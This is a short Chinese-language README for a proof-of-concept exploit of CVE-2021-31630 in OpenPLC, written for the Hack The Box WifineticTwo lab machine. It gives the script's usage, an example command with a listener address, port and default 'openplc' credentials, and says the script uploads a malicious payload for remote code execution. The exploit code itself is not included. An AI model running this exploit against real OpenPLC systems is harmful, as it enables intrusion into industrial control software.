针对 Hack The Box 平台 WifineticTwo 主机上 OpenPLC 的 CVE-2021-31630 漏洞利用 PoC, 此脚本作为 CVE-2021-31630 的概念验证 (PoC) 漏洞利用,针对 Hack The Box 平台上 WifineticTwo 主机运行的 OpenPLC 服务。
python exploit.py -ip <IP_ADDRESS_FOR_LISTEN> -p <PORT_FOR_LISTEN> -u <USERNAME> -pwd <PASSWORD>
python ./exploit.py -ip 10.10.16.5 -p 1337 -u openplc -pwd openplc
-ip <IP_ADDRESS>: 指定监听的 IP 地址。-p : 指定监听的端口。-u : 指定 OpenPLC 登录的用户名。-pwd : 指定 OpenPLC 登录的密码。此脚本利用 OpenPLC 中的 CVE-2021-31630 漏洞,允许在 WifineticTwo 主机上远程执行代码。它会建立到目标 IP 和端口的连接,使用提供的用户名和密码进行身份验证,并上传恶意负载以执行任意代码。
由 z1ntrx 创建
此脚本仅用于教育和测试目的。请负责任地使用,并且仅在你拥有明确测试权限的系统上使用。